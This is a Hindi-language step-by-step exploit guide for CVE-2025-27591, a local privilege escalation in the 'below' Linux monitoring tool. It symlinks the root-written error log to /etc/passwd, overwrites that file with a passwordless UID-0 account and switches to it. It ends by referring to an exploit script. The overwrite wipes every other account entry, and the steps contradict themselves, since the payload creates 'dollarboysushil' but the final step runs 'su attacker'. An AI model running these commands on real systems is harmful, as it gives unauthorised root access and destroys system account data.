
CVE-2025-27591 Below सेवा (संस्करण < v0.9.0) में एक ज्ञात विशेषाधिकार वृद्धि भेद्यता है।
below में लिखने योग्य सिमलिंक के माध्यम से विशेषाधिकार वृद्धियह CVE-2025-27591 के लिए एक सरल शोषण है, जो below Linux सिस्टम मॉनिटरिंग टूल में एक स्थानीय विशेषाधिकार वृद्धि भेद्यता है। यह भेद्यता v0.9.0 से पहले के संस्करणों को प्रभावित करती है और सिस्टम में गलत अनुमति असाइनमेंट के कारण उत्पन्न होती है। यह मुद्दा जनवरी 2025 में खोजा गया था और 12 मार्च 2025 को सार्वजनिक रूप से प्रकट किया गया (SecurityOnline, OpenWall)। जब below को sudo के साथ चलाया जाता है, तो यह विश्व-लेखन योग्य निर्देशिका (/var/log/below) में त्रुटियों को लॉग कर सकता है, जिससे हमलावरों को /etc/passwd जैसे संवेदनशील लक्ष्यों पर एक लॉग फ़ाइल को सिमलिंक करने की अनुमति मिलती है।
इसका शोषण करके, below तक sudo पहुँच वाला एक विशेषाधिकार रहित उपयोगकर्ता रूट तक विशेषाधिकार बढ़ा सकता है।
belowbelow record के माध्यम से लॉगिंग/var/log/below/error_root.log/var/log/below विश्व-लेखन योग्य हैsudo /usr/bin/below record चला सकता है✅ चरण 1: विश्व-लेखन योग्य लॉग निर्देशिका सत्यापित करें
आपको देखना चाहिए:
drwxrwxrwx 2 root root 4096 ... /var/log/below

✅ चरण 2: किसी भी मौजूदा error_root.log को हटाएँ
rm -f /var/log/below/error_root.log
✅ चरण 3: /etc/passwd के लिए एक सिमलिंक बनाएँ
ln -s /etc/passwd /var/log/below/error_root.log
फिर इसका उपयोग करके जाँच करें
ls -la /var/log/below/error_root.log
# should show: error_root.log -> /etc/passwd

✅ चरण 4: एक पेलोड फ़ाइल बनाएँ
यह बिना पासवर्ड के एक नया रूट उपयोगकर्ता attacker जोड़ेगा:
echo 'dollarboysushil::0:0:dollarboysusil:/root:/bin/bash' > /tmp/payload
फ़ाइल संरचना
username:password:UID:GID:comment(home/full name):home_directory:shell
यहाँ मुख्य बात UID और GUID है
हम UID और GUID को 0 पर सेट कर रहे हैं, जिससे उपयोगकर्ता रूट उपयोगकर्ता बन जाता है और Group ID = रूट ग्रुप

✅ चरण 5: रूट के रूप में लॉग लिखने को ट्रिगर करें
यह शोषण का मूल है।
sudo /usr/bin/below record
यह कमांड विफल या टाइमआउट होने की उम्मीद है — लेकिन यह /var/log/below/error_root.log पर त्रुटि लॉग लिखने का प्रयास करेगा, जो वास्तव में /etc/passwd है।
💡 कुछ मामलों में, यह अकेला /etc/passwd को दूषित कर सकता है — इसलिए हम इसे अगले चरण में पूरी तरह से अधिलेखित करते हैं।
✅ चरण 6: सिमलिंक के माध्यम से /etc/passwd को अधिलेखित करें
cp /tmp/payload /var/log/below/error_root.log

✅ चरण 7: रूट बनें
su attacker
आप बिना पासवर्ड के रूट शेल में प्रवेश कर जाएँगे।

python3 dbs_exploit.py
